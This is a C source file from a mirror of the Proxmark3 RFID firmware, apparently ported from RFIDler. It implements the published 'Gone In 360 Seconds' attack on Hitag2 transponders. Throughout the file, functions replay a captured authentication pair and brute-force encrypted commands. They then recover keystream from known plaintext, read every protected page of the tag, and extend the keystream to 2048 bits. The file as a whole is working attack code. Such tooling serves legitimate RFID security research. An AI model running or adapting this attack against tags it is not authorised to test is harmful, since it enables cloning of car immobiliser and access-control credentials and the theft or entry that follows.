mirror of
https://github.com/RfidResearchGroup/proxmark3.git
synced 2024-11-22 21:40:18 -08:00
442 lines
15 KiB
C
442 lines
15 KiB
C
//-----------------------------------------------------------------------------
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// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details.
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//
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// This program is free software: you can redistribute it and/or modify
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// it under the terms of the GNU General Public License as published by
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// the Free Software Foundation, either version 3 of the License, or
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// (at your option) any later version.
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//
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// This program is distributed in the hope that it will be useful,
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// but WITHOUT ANY WARRANTY; without even the implied warranty of
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// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
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// GNU General Public License for more details.
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//
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// See LICENSE.txt for the text of the license.
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//-----------------------------------------------------------------------------
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// This coode has been converted from RFIDler source code to work with Proxmark3.
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// https://github.com/AdamLaurie/RFIDler/blob/master/firmware/Pic32/RFIDler.X/src/hitag2crack.c
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#include "hitag2_crack.h"
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#include "hitag2/hitag2_crypto.h"
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#include "hitag2.h"
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#include "proxmark3_arm.h"
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#include "commonutil.h"
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#include "dbprint.h"
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#include "util.h"
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#include "string.h"
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#include "BigBuf.h"
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#include "cmd.h"
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#include "lfadc.h"
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// #define READP0CMD "1100000111"
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const static uint8_t read_p0_cmd[] = {1, 1, 0, 0, 0, 0, 0, 1, 1, 1};
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// hitag2crack_xor XORs the source with the pad to produce the target.
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// source, target and pad are binarrays of length len.
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static void hitag2crack_xor(uint8_t *target, const uint8_t *source, const uint8_t *pad, size_t len) {
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for (size_t i = 0; i < len; i++) {
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target[i] = source[i] ^ pad[i];
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}
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}
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// hitag2crack_send_e_cmd replays the auth and sends the given encrypted
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// command.
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// responsestr is the hexstring of the response to the command;
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// nrar is the 64 bit binarray of the nR aR pair;
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// cmd is the binarray of the encrypted command to send;
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// len is the length of the encrypted command.
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static bool hitag2crack_send_e_cmd(uint8_t *resp, uint8_t *nrar, uint8_t *cmd, size_t len) {
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memset(resp, 0, 4);
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// Get UID
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if (ht2_read_uid(NULL, true, false, true) != PM3_SUCCESS) {
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return false;
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}
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// send nrar and receive (useless) encrypted page 3 value
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size_t n = 0;
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if (ht2_tx_rx(nrar, 64, NULL, &n, true, true) != PM3_SUCCESS) {
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return false;
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}
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// send encrypted command
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n = 0;
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ht2_tx_rx(cmd, len, resp, &n, true, false);
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if (n == 32) {
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return true;
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}
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return false;
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}
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// hitag2crack_read_page uses the supplied key stream and nrar pair to read the
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// given page, returning the response as a hexstring.
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// responsestr is the returned hexstring;
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// pagenum is the page number to read;
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// nrar is the 64 bit binarray of the nR aR pair;
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// keybits is the binarray of the key stream.
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static bool hitag2crack_read_page(uint8_t *resp, uint8_t pagenum, uint8_t *nrar, uint8_t *keybits) {
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if (pagenum > 7) {
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return false;
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}
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// create cmd
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uint8_t cmd[10];
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memcpy(cmd, read_p0_cmd, sizeof(read_p0_cmd));
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if (pagenum & 0x1) {
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cmd[9] = !cmd[9];
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cmd[4] = !cmd[4];
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}
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if (pagenum & 0x2) {
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cmd[8] = !cmd[8];
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cmd[3] = !cmd[3];
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}
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if (pagenum & 0x4) {
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cmd[7] = !cmd[7];
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cmd[2] = !cmd[2];
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}
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// encrypt command
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uint8_t e_cmd[10] = {0};
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hitag2crack_xor(e_cmd, cmd, keybits, 10);
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// send encrypted command
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uint8_t e_resp[4];
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if (hitag2crack_send_e_cmd(e_resp, nrar, e_cmd, 10)) {
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uint8_t e_response[32] = {0};
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uint8_t response[32] = {0};
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// convert to binarray
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hex2binarray_n((char *)e_response, (char *)e_resp, 4);
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// decrypt response
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hitag2crack_xor(response, e_response, keybits + 10, 32);
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// convert to hexstring
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binarray2hex(response, 32, resp);
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return true;
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}
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return false;
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}
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// hitag2crack_test_e_p0cmd XORs the message (command + response) with the
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// encrypted version to retrieve the key stream. It then uses this key stream
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// to encrypt an extended version of the READP0CMD and tests if the response
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// is valid.
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// keybits is the returned binarray of the key stream;
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// nrar is the 64 bit binarray of nR aR pair;
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// e_cmd is the binarray of the encrypted command;
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// uid is the binarray of the card UID;
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// e_uid is the binarray of the encrypted version of the UID.
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static bool hitag2crack_test_e_p0cmd(uint8_t *keybits, uint8_t *nrar, uint8_t *e_cmd, uint8_t *uid, uint8_t *e_uid) {
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uint8_t cipherbits[42] = {0};
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memcpy(cipherbits, e_cmd, 10); // copy encrypted cmd to cipherbits
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memcpy(cipherbits + 10, e_uid, 32); // copy encrypted uid to cipherbits
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uint8_t plainbits[42] = {0};
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memcpy(plainbits, read_p0_cmd, sizeof(read_p0_cmd)); // copy cmd to plainbits
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memcpy(plainbits + 10, uid, 32); // copy uid to plainbits
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// xor the plainbits with the cipherbits to get keybits
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hitag2crack_xor(keybits, plainbits, cipherbits, 42);
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// create extended cmd -> 4 * READP0CMD = 40 bits
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// xor extended cmd with keybits
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uint8_t e_ext_cmd[40] = {0};
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hitag2crack_xor(e_ext_cmd, read_p0_cmd, keybits, 10);
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hitag2crack_xor(e_ext_cmd + 10, read_p0_cmd, keybits + 10, 10);
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hitag2crack_xor(e_ext_cmd + 20, read_p0_cmd, keybits + 20, 10);
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hitag2crack_xor(e_ext_cmd + 30, read_p0_cmd, keybits + 30, 10);
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// send extended encrypted cmd
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uint8_t resp[4] = {0};
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if (hitag2crack_send_e_cmd(resp, nrar, e_ext_cmd, 40)) {
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return true;
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}
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return false;
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}
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// hitag2crack_find_e_page0_cmd tries all bit-flipped combinations of the
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// valid encrypted command and tests the results by attempting an extended
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// command version of the command to see if that produces a valid response.
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// keybits is the returned binarray of the recovered key stream;
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// e_page0cmd is the returned binarray of the encrypted 'read page 0' command;
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// e_firstcmd is the binarray of the first valid encrypted command found;
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// nrar is the binarray of the 64 bit nR aR pair;
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// uid is the binarray of the 32 bit UID.
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static bool hitag2crack_find_e_page0_cmd(uint8_t *keybits, uint8_t *e_firstcmd, uint8_t *nrar, uint8_t *uid) {
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// we're going to brute the missing 4 bits of the valid encrypted command
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for (uint8_t a = 0; a < 2; a++) {
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for (uint8_t b = 0; b < 2; b++) {
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for (uint8_t c = 0; c < 2; c++) {
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for (uint8_t d = 0; d < 2; d++) {
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// create our guess by bit flipping the pattern of bits
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// representing the inverted bit and the 3 page bits
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// in both the non-inverted and inverted parts of the
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// encrypted command.
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uint8_t guess[10];
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memcpy(guess, e_firstcmd, 10);
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if (a) {
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guess[5] = !guess[5];
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guess[0] = !guess[0];
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}
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if (b) {
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guess[7] = !guess[7];
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guess[2] = !guess[2];
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}
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if (c) {
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guess[8] = !guess[8];
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guess[3] = !guess[3];
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}
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if (d) {
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guess[9] = !guess[9];
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guess[4] = !guess[4];
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}
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// try the guess
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uint8_t resp[4] = {0};
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if (hitag2crack_send_e_cmd(resp, nrar, guess, 10)) {
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// convert response to binarray
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// response should been encrypted UID
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uint8_t e_uid[32] = {0};
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hex2binarray_n((char *)e_uid, (char *)resp, 4);
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// test if the guess was 'read page 0' command
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if (hitag2crack_test_e_p0cmd(keybits, nrar, guess, uid, e_uid)) {
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return true;
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}
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}
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}
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}
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}
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}
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return false;
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}
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// hitag2crack_find_valid_e_cmd repeatedly replays the auth protocol each
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// with a different sequential encrypted command value in order to find one
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// that returns a valid response.
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// e_cmd is the returned binarray of the valid encrypted command;
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// nrar is the binarray of the 64 bit nR aR pair.
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static bool hitag2crack_find_valid_e_cmd(uint8_t *e_cmd, uint8_t *nrar) {
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// we're going to hold bits 5, 7, 8 and 9 and brute force the rest
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// e.g. x x x x x 0 x 0 0 0
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for (uint8_t a = 0; a < 2; a++) {
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for (uint8_t b = 0; b < 2; b++) {
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for (uint8_t c = 0; c < 2; c++) {
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for (uint8_t d = 0; d < 2; d++) {
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for (uint8_t e = 0; e < 2; e++) {
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for (uint8_t g = 0; g < 2; g++) {
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// build binarray
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uint8_t guess[10] = { a, b, c, d, e, 0, g, 0, 0, 0 };
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// send guess
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uint8_t resp[4] = {0};
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if (hitag2crack_send_e_cmd(resp, nrar, guess, sizeof(guess))) {
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// return the guess as the encrypted command
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memcpy(e_cmd, guess, 10);
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return true;
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}
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}
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}
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}
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}
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}
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}
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return false;
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}
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typedef struct {
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uint8_t keybits[2080];
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uint8_t uid[32];
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uint8_t nrar[64];
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uint8_t e_ext_cmd[2080];
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} PACKED lf_hitag_crack2_t;
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// hitag2_crack implements the first crack algorithm described in the paper,
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// Gone In 360 Seconds by Verdult, Garcia and Balasch.
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// response is a multi-line text response containing the 8 pages of the cracked tag
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// nrarhex is a string containing hex representations of the 32 bit nR and aR values
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void ht2_crack1(uint8_t *nrar_hex) {
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clear_trace();
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lf_hitag_crack_response_t packet;
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memset((uint8_t *)&packet, 0x00, sizeof(lf_hitag_crack_response_t));
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int res = PM3_SUCCESS;
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// get uid as hexstring
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uint8_t uid_hex[4];
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if (ht2_read_uid(uid_hex, false, false, false) != PM3_SUCCESS) {
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packet.status = -1;
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res = PM3_EFAILED;
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goto out;
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}
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// convert to binarray
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uint8_t nrar[64] = {0};
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hex2binarray_n((char *)nrar, (char *)nrar_hex, 8);
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// find a valid encrypted command
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uint8_t e_firstcmd[10];
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if (hitag2crack_find_valid_e_cmd(e_firstcmd, nrar) == false) {
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packet.status = -2;
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res = PM3_EFAILED;
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goto out;
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}
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// now we got a first encrypted command inside e_firstcmd
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uint8_t uid[32];
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hex2binarray_n((char *)uid, (char *)uid_hex, 4);
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// find the 'read page 0' command and recover key stream
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uint8_t keybits[42];
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if (hitag2crack_find_e_page0_cmd(keybits, e_firstcmd, nrar, uid) == false) {
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packet.status = -3;
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res = PM3_EFAILED;
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goto out;
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}
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// read all pages using key stream
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for (uint8_t i = 1; i < 8; i++) {
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hitag2crack_read_page(packet.data + (i * 4), i, nrar, keybits);
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}
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// copy UID since we already have it...
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memcpy(packet.data, uid_hex, 4);
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packet.status = 1;
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out:
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reply_ng(CMD_LF_HITAG2_CRACK, res, (uint8_t *)&packet, sizeof(lf_hitag_crack_response_t));
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}
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// hitag2_keystream uses the first crack algorithm described in the paper,
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// Gone In 360 Seconds by Verdult, Garcia and Balasch, to retrieve 2048 bits of keystream.
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// response is a multi-line text response containing the hex of the keystream;
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// nrar_hex is the 32 bit nR and aR in hex
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void ht2_crack2(uint8_t *nrar_hex) {
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BigBuf_free();
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uint8_t *e_response = BigBuf_calloc(32);
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lf_hitag_crack2_t *c2 = (lf_hitag_crack2_t *)BigBuf_calloc(sizeof(lf_hitag_crack2_t));
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g_logging = false;
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LEDsoff();
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set_tracing(false);
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clear_trace();
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// find the 'read page 0' command and recover key stream
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// get uid as hexstring
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uint8_t uid_hex[4] = {0};
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if (ht2_read_uid(uid_hex, false, false, false) != PM3_SUCCESS) {
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BigBuf_free();
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reply_ng(CMD_LF_HITAG2_CRACK_2, PM3_EFAILED, NULL, 0);
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return;
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}
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hex2binarray_n((char *)c2->uid, (char *)uid_hex, 4);
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hex2binarray_n((char *)c2->nrar, (char *)nrar_hex, 8);
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DbpString("looking for encrypted command");
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// find a valid encrypted command
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uint8_t e_firstcmd[10] = {0};
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if (hitag2crack_find_valid_e_cmd(e_firstcmd, c2->nrar) == false) {
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BigBuf_free();
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reply_ng(CMD_LF_HITAG2_CRACK_2, PM3_EFAILED, NULL, 0);
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return;
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}
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DbpString("looking for encrypted page 0");
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// find encrypted page0 commnd
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if (hitag2crack_find_e_page0_cmd(c2->keybits, e_firstcmd, c2->nrar, c2->uid) == false) {
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BigBuf_free();
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reply_ng(CMD_LF_HITAG2_CRACK_2, PM3_EFAILED, NULL, 0);
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return;
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}
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// We got 42 bits of keystream in c2->keybits.
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// using the 40 bits of keystream in keybits, sending commands with ever
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// increasing lengths to acquire 2048 bits of key stream.
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int kslen = 40;
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int res = PM3_SUCCESS;
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while (kslen < 2048 && BUTTON_PRESS() == false) {
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hitag2crack_xor(c2->e_ext_cmd, read_p0_cmd, c2->keybits, 10);
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hitag2crack_xor(c2->e_ext_cmd + 10, read_p0_cmd, c2->keybits + 10, 10);
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hitag2crack_xor(c2->e_ext_cmd + 20, read_p0_cmd, c2->keybits + 20, 10);
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hitag2crack_xor(c2->e_ext_cmd + 30, read_p0_cmd, c2->keybits + 30, 10);
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Dbprintf("Recovered " _YELLOW_("%4i") " bits of keystream", kslen);
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// Get UID
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if (ht2_read_uid(NULL, true, false, true) != PM3_SUCCESS) {
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res = PM3_EFAILED;
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break;
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}
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// send nrar and receive (useless) encrypted page 3 value
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size_t n = 0;
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if (ht2_tx_rx(c2->nrar, 64, NULL, &n, true, true) != PM3_SUCCESS) {
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res = PM3_EFAILED;
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break;
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}
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uint8_t resp[4] = {0};
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res = ht2_tx_rx(c2->e_ext_cmd, kslen, resp, &n, true, false);
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if (res != PM3_SUCCESS) {
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Dbprintf("tx/rx failed, got %zu (res... %i)", n, res);
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break;
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}
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// convert response to binarray
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hex2binarray_n((char *)e_response, (char *)resp, 4);
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// recover keystream from encrypted response
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hitag2crack_xor(c2->keybits + kslen, e_response, c2->uid, 32);
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// extented with 30 bits or 3 * 10 read_p0_cmds
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hitag2crack_xor(c2->e_ext_cmd + kslen, read_p0_cmd, c2->keybits + kslen, 10);
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kslen += 10;
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hitag2crack_xor(c2->e_ext_cmd + kslen, read_p0_cmd, c2->keybits + kslen, 10);
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kslen += 10;
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hitag2crack_xor(c2->e_ext_cmd + kslen, read_p0_cmd, c2->keybits + kslen, 10);
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kslen += 10;
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}
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Dbprintf("Recovered " _YELLOW_("%4i") " bits of keystream", kslen);
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lf_hitag_crack_response_t *packet = (lf_hitag_crack_response_t *)BigBuf_calloc(sizeof(lf_hitag_crack_response_t));
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packet->status = 1;
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binarray2hex(c2->keybits, kslen, packet->data);
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reply_ng(CMD_LF_HITAG2_CRACK_2, res, (uint8_t *)packet, sizeof(lf_hitag_crack_response_t));
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BigBuf_free();
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return;
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}
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